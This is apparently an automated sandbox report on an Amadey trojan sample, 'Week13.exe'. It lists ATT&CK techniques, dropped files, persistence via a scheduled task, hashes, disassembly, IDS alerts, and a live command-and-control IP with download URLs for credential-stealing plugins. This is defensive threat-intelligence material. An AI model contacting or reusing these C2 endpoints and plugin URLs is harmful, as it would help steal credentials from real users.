                  Source: Yara matchFile source: 00000012.00000002.2495730758.0000000000441000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000000.1905919895.0000000000441000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4210225750.0000000000441000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe, type: DROPPED
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Scheduled Task/Job
                  1
                  Scheduled Task/Job
                  11
                  Process Injection
                  1
                  Masquerading
                  OS Credential Dumping11
                  Security Software Discovery
                  Remote ServicesData from Local System1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  Registry Run Keys / Startup Folder
                  1
                  Scheduled Task/Job
                  21
                  Virtualization/Sandbox Evasion
                  LSASS Memory21
                  Virtualization/Sandbox Evasion
                  Remote Desktop ProtocolData from Removable Media2
                  Non-Application Layer Protocol
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  Services File Permissions Weakness
                  1
                  Registry Run Keys / Startup Folder
                  11
                  Process Injection
                  Security Account Manager1
                  Application Window Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive12
                  Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  DLL Side-Loading
                  1
                  Services File Permissions Weakness
                  1
                  Services File Permissions Weakness
                  NTDS1
                  File and Directory Discovery
                  Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  LSA Secrets12
                  System Information Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1561232 Sample: Week13.exe Startdate: 22/11/2024 Architecture: WINDOWS Score: 100 41 Suricata IDS alerts for network traffic 2->41 43 Found malware configuration 2->43 45 Antivirus detection for URL or domain 2->45 47 7 other signatures 2->47 8 Week13.exe 4 2->8         started        11 oneetx.exe 2->11         started        13 oneetx.exe 2->13         started        15 3 other processes 2->15 process3 file4 35 C:\Users\user\AppData\Local\...\oneetx.exe, PE32 8->35 dropped 37 C:\Users\user\...\oneetx.exe:Zone.Identifier, ASCII 8->37 dropped 17 oneetx.exe 17 8->17         started        process5 dnsIp6 39 193.3.19.154, 49730, 49731, 49732 ARNES-NETAcademicandResearchNetworkofSloveniaSI Denmark 17->39 49 Antivirus detection for dropped file 17->49 51 Multi AV Scanner detection for dropped file 17->51 53 Creates an undocumented autostart registry key 17->53 55 2 other signatures 17->55 21 cmd.exe 1 17->21         started        23 schtasks.exe 1 17->23         started        signatures7 process8 process9 25 conhost.exe 21->25         started        27 cmd.exe 1 21->27         started        29 cacls.exe 1 21->29         started        33 4 other processes 21->33 31 conhost.exe 23->31         started       

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Week13.exe92%ReversingLabsWin32.Trojan.Amadey
                  Week13.exe100%AviraHEUR/AGEN.1317762
                  Week13.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe100%AviraHEUR/AGEN.1317762
                  C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe92%ReversingLabsWin32.Trojan.Amadey
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://193.3.19.154/store/games/Plugins/cred64.dll?100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/index.php4~100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/Plugins/cred64.dll100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/index.php5a2ab05100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/index.php100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/index.phpb100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/Plugins/cred64.dll;100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/index.phph100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/Plugins/cred64.dllmingM100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/index.phpp#100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/index.phpSf7XJqPNYA2AOsO34i0TH=100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/index.php9100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/index.phpp100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/Plugins/cred64.dllal100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/Plugins/cred64.dll1100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/index.phpcoded100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/index.phpX100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/Plugins/cred64.dll-100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/index.php2465a8e1dc15491b69b82f20100%Avira URL Cloudmalware
                  http://193.3.19.154/store/games/Plugins/clip64.dll100%Avira URL Cloudmalware
                  No contacted domains info
                  NameMaliciousAntivirus DetectionReputation
                  http://193.3.19.154/store/games/index.phptrue
                  • Avira URL Cloud: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://193.3.19.154/store/games/index.phpboneetx.exe, 00000001.00000002.4210344439.0000000000C96000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://193.3.19.154/store/games/Plugins/cred64.dlloneetx.exe, 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, oneetx.exe, 00000001.00000002.4210344439.0000000000C96000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://193.3.19.154/store/games/Plugins/cred64.dllmingMoneetx.exe, 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://193.3.19.154/store/games/index.php4~oneetx.exe, 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://193.3.19.154/store/games/Plugins/cred64.dll?oneetx.exe, 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://193.3.19.154/store/games/index.phphoneetx.exe, 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://193.3.19.154/store/games/Plugins/cred64.dll;oneetx.exe, 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://193.3.19.154/store/games/index.php5a2ab05oneetx.exe, 00000001.00000002.4210344439.0000000000C96000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://193.3.19.154/store/games/index.phpp#oneetx.exe, 00000001.00000002.4210344439.0000000000C96000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://193.3.19.154/store/games/index.phpSf7XJqPNYA2AOsO34i0TH=oneetx.exe, 00000001.00000002.4210344439.0000000000C96000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://193.3.19.154/store/games/Plugins/cred64.dllaloneetx.exe, 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://193.3.19.154/store/games/index.phpponeetx.exe, 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://193.3.19.154/store/games/index.php9oneetx.exe, 00000001.00000002.4210344439.0000000000C96000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://193.3.19.154/store/games/Plugins/cred64.dll1oneetx.exe, 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://193.3.19.154/store/games/index.phpXoneetx.exe, 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://193.3.19.154/store/games/index.phpcodedoneetx.exe, 00000001.00000002.4210344439.0000000000C96000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://193.3.19.154/store/games/Plugins/clip64.dlloneetx.exe, 00000001.00000002.4210344439.0000000000C96000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://193.3.19.154/store/games/index.php2465a8e1dc15491b69b82f20oneetx.exe, 00000001.00000002.4210344439.0000000000C96000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://193.3.19.154/store/games/Plugins/cred64.dll-oneetx.exe, 00000001.00000002.4210344439.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  193.3.19.154
                  unknownDenmark
                  2107ARNES-NETAcademicandResearchNetworkofSloveniaSItrue
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1561232
                  Start date and time:2024-11-22 23:00:48 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 32s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:21
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Week13.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.winEXE@26/6@0/1
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: Week13.exe
                  TimeTypeDescription
                  17:01:47API Interceptor11297487x Sleep call for process: oneetx.exe modified
                  22:01:47Task SchedulerRun new task: oneetx.exe path: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  193.3.19.154HRU6b08mmd.exeGet hashmaliciousAmadey, Healer AV Disabler, PureLog Stealer, RedLineBrowse
                  • 193.3.19.154/store/games/index.php
                  V4D7O37Q2C.exeGet hashmaliciousAmadey, RedLineBrowse
                  • 193.3.19.154/store/games/index.php
                  TEpJB9Z7uL.exeGet hashmaliciousAmadey, RedLineBrowse
                  • 193.3.19.154/store/games/index.php
                  hd6tZze1Cp.exeGet hashmaliciousAmadey, RedLineBrowse
                  • 193.3.19.154/store/games/index.php
                  yab5PS1Mst.exeGet hashmaliciousAmadey, RedLineBrowse
                  • 193.3.19.154/store/games/index.php
                  JeGitbTYgL.exeGet hashmaliciousAmadey, RedLineBrowse
                  • 193.3.19.154/store/games/index.php
                  file.exeGet hashmaliciousAmadey, RedLineBrowse
                  • 193.3.19.154/store/games/index.php
                  file.exeGet hashmaliciousAmadey, RedLineBrowse
                  • 193.3.19.154/store/games/index.php
                  file.exeGet hashmaliciousAmadey, RedLineBrowse
                  • 193.3.19.154/store/games/index.php
                  ZnLqDnAIwW.exeGet hashmaliciousAmadey, RedLineBrowse
                  • 193.3.19.154/store/games/index.php
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  ARNES-NETAcademicandResearchNetworkofSloveniaSI1Sj5F6P4nv.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                  • 193.3.19.151
                  5LEXIucyEP.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                  • 193.3.19.151
                  44qLDKzsfO.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                  • 193.3.19.151
                  gP5rh6fa0S.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                  • 193.3.19.151
                  urkOkB0BdX.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                  • 193.3.19.151
                  8F0oMWUhg7.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                  • 193.3.19.151
                  botx.mpsl.elfGet hashmaliciousMiraiBrowse
                  • 95.87.151.60
                  yakuza.mips.elfGet hashmaliciousUnknownBrowse
                  • 194.249.92.194
                  HRU6b08mmd.exeGet hashmaliciousAmadey, Healer AV Disabler, PureLog Stealer, RedLineBrowse
                  • 193.3.19.154
                  Josho.x86.elfGet hashmaliciousUnknownBrowse
                  • 95.87.138.87
                  No context
                  No context
                  Process:C:\Users\user\Desktop\Week13.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):209950
                  Entropy (8bit):6.342521487985493
                  Encrypted:false
                  SSDEEP:3072:c/frTDzurT1S3CzpdmnATE55zjExkKGruONMvhu5QTXzeJX2vkMfSDPwU:Wfrnzurs3Czpexj2kGOIu5QTyJMKk
                  MD5:A1B8FA53A47B1991EE76A46EE8685B7D
                  SHA1:4002A9CFFCDE9F7F44633457457792564A63BF5D
                  SHA-256:E472FD69B5A891059F44206124BAF829CB7583890E2C8E288E311359A2249871
                  SHA-512:F685FEF174DED44E2ECA9DF2F75F858611B45672E4DE5D81C868BB7441F476BC20AB8421AE48E2D004B960672C35190C2F4F6B9975A67596DE204918C6E52613
                  Malicious:true
                  Yara Hits:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe, Author: Joe Security
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 92%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..M.o...o...o..B....o..B....o..B....o.......o.......o......5o..B....o...o...o.......o....m..o.......o..Rich.o..................PE..L.....Bd.................t........../U............@.......................................@.....................................d....@.......................P... ..`...p...................t...........@............................................text...-r.......t.................. ..`.rdata..t|.......~...x..............@..@.data...('..........................@....rsrc........@......................@..@.reloc... ...P..."..................@..B........................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\Week13.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Preview:[ZoneTransfer]....ZoneId=0
                  Process:C:\Windows\SysWOW64\cacls.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):15
                  Entropy (8bit):3.240223928941852
                  Encrypted:false
                  SSDEEP:3:o3F:o1
                  MD5:509B054634B6DE74F111C3E646BC80FD
                  SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                  SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                  SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                  Malicious:false
                  Preview:processed dir:
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):6.342521487985493
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:Week13.exe
                  File size:209'950 bytes
                  MD5:a1b8fa53a47b1991ee76a46ee8685b7d
                  SHA1:4002a9cffcde9f7f44633457457792564a63bf5d
                  SHA256:e472fd69b5a891059f44206124baf829cb7583890e2c8e288e311359a2249871
                  SHA512:f685fef174ded44e2eca9df2f75f858611b45672e4de5d81c868bb7441f476bc20ab8421ae48e2d004b960672c35190c2f4f6b9975a67596de204918c6e52613
                  SSDEEP:3072:c/frTDzurT1S3CzpdmnATE55zjExkKGruONMvhu5QTXzeJX2vkMfSDPwU:Wfrnzurs3Czpexj2kGOIu5QTyJMKk
                  TLSH:F524F6257D12C032D561A1B619F5BFF2C59CA828A7B049DB7B800F77DA122F73960E39
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..M.o...o...o..B....o..B....o..B....o.......o.......o......5o..B....o...o...o.......o....m..o.......o..Rich.o.................
                  Icon Hash:90cececece8e8eb0
                  Entrypoint:0x41552f
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Time Stamp:0x6442E0B0 [Fri Apr 21 19:14:56 2023 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:6
                  OS Version Minor:0
                  File Version Major:6
                  File Version Minor:0
                  Subsystem Version Major:6
                  Subsystem Version Minor:0
                  Import Hash:f8cc61ade86cb7277d0ab974de6323cb
                  Instruction
                  call 00007F66B8C3ECC9h
                  jmp 00007F66B8C3E6B9h
                  jmp 00007F66B8C41809h
                  push ebp
                  mov ebp, esp
                  sub esp, 00000324h
                  push ebx
                  push 00000017h
                  call 00007F66B8C4D819h
                  test eax, eax
                  je 00007F66B8C3E847h
                  mov ecx, dword ptr [ebp+08h]
                  int 29h
                  push 00000003h
                  call 00007F66B8C3E9EBh
                  mov dword ptr [esp], 000002CCh
                  lea eax, dword ptr [ebp-00000324h]
                  push 00000000h
                  push eax
                  call 00007F66B8C3F191h
                  add esp, 0Ch
                  mov dword ptr [ebp-00000274h], eax
                  mov dword ptr [ebp-00000278h], ecx
                  mov dword ptr [ebp-0000027Ch], edx
                  mov dword ptr [ebp-00000280h], ebx
                  mov dword ptr [ebp-00000284h], esi
                  mov dword ptr [ebp-00000288h], edi
                  mov word ptr [ebp-0000025Ch], ss
                  mov word ptr [ebp-00000268h], cs
                  mov word ptr [ebp-0000028Ch], ds
                  mov word ptr [ebp-00000290h], es
                  mov word ptr [ebp-00000294h], fs
                  mov word ptr [ebp-00000298h], gs
                  pushfd
                  pop dword ptr [ebp-00000264h]
                  mov eax, dword ptr [ebp+04h]
                  mov dword ptr [ebp-0000026Ch], eax
                  lea eax, dword ptr [ebp+04h]
                  mov dword ptr [ebp-00000260h], eax
                  mov dword ptr [ebp-00000324h], 00010001h
                  mov eax, dword ptr [eax-04h]
                  push 00000050h
                  mov dword ptr [ebp-00000270h], eax
                  lea eax, dword ptr [ebp-58h]
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x300d80x64.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000x1e0.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x350000x208c.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x2f3600x70.rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x2f4740x18.rdata
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2f3d00x40.rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x290000x204.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x2722d0x27400f8a1f275d950abfb13b70d936b801360False0.4442426353503185data6.4362141478020645IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x290000x7c740x7e00a9c9e415c77aeb6ff53c4ca6792ae320False0.4195808531746032data4.991773718102028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x310000x27280x1800214e19b3a3a6d8354fa90e8a17cf746eFalse0.08658854166666667data1.3673078527283469IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x340000x1e00x2001b99276507c6356b24a31f63887375dfFalse0.52734375data4.7176788329467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x350000x208c0x22001f9afe88c86e7b78ae326a57253f65d5False0.7651654411764706data6.522595049005223IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_MANIFEST0x340600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                  DLLImport
                  KERNEL32.dllGetFileAttributesA, CreateFileA, CloseHandle, GetSystemInfo, CreateThread, HeapAlloc, GetThreadContext, GetProcAddress, VirtualAllocEx, LocalFree, GetLastError, ReadProcessMemory, GetProcessHeap, CreateProcessA, CreateDirectoryA, SetThreadContext, WriteConsoleW, ReadConsoleW, SetEndOfFile, SetFilePointerEx, GetTempPathA, Sleep, SetCurrentDirectoryA, GetModuleHandleA, GetComputerNameExW, ResumeThread, GetVersionExW, CreateMutexA, VirtualAlloc, WriteFile, VirtualFree, HeapFree, WriteProcessMemory, GetModuleFileNameA, RemoveDirectoryA, ReadFile, HeapReAlloc, HeapSize, GetTimeZoneInformation, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetStringTypeW, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetStdHandle, GetFullPathNameW, GetCurrentDirectoryW, DeleteFileW, LCMapStringW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, GetModuleHandleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RaiseException, SetLastError, RtlUnwind, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetModuleFileNameW, GetStdHandle, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, CompareStringW, DecodePointer
                  ADVAPI32.dllRegCloseKey, RegQueryValueExA, GetUserNameA, RegSetValueExA, RegOpenKeyExA, ConvertSidToStringSidW, GetUserNameW, LookupAccountNameW
                  SHELL32.dllSHGetFolderPathA, ShellExecuteA, SHFileOperationA
                  WININET.dllHttpOpenRequestA, InternetReadFile, InternetConnectA, HttpSendRequestA, InternetCloseHandle, InternetOpenA, InternetOpenW, InternetOpenUrlA
                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States
                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2024-11-22T23:01:49.628585+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.450063193.3.19.15480TCP
                  2024-11-22T23:01:49.628585+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.450063193.3.19.15480TCP
                  2024-11-22T23:01:53.630805+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449730193.3.19.15480TCP
                  2024-11-22T23:01:53.631928+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449731193.3.19.15480TCP
                  2024-11-22T23:01:53.631928+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449731193.3.19.15480TCP
                  2024-11-22T23:01:57.875819+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449732193.3.19.15480TCP
                  2024-11-22T23:01:57.875819+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449732193.3.19.15480TCP
                  2024-11-22T23:02:02.094612+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449733193.3.19.15480TCP
                  2024-11-22T23:02:02.094612+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449733193.3.19.15480TCP
                  2024-11-22T23:02:02.094616+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449734193.3.19.15480TCP
                  2024-11-22T23:02:06.329029+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449735193.3.19.15480TCP
                  2024-11-22T23:02:06.329029+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449735193.3.19.15480TCP
                  2024-11-22T23:02:10.547661+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449739193.3.19.15480TCP
                  2024-11-22T23:02:10.547760+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449737193.3.19.15480TCP
                  2024-11-22T23:02:10.547760+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449737193.3.19.15480TCP
                  2024-11-22T23:02:14.766326+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449742193.3.19.15480TCP
                  2024-11-22T23:02:14.766326+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449742193.3.19.15480TCP
                  2024-11-22T23:02:19.003986+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449745193.3.19.15480TCP
                  2024-11-22T23:02:19.003986+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449745193.3.19.15480TCP
                  2024-11-22T23:02:19.004101+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449746193.3.19.15480TCP
                  2024-11-22T23:02:23.236152+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449747193.3.19.15480TCP
                  2024-11-22T23:02:23.236152+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449747193.3.19.15480TCP
                  2024-11-22T23:02:27.476781+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449749193.3.19.15480TCP
                  2024-11-22T23:02:27.476830+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449748193.3.19.15480TCP
                  2024-11-22T23:02:27.476830+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449748193.3.19.15480TCP
                  2024-11-22T23:02:31.704018+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449750193.3.19.15480TCP
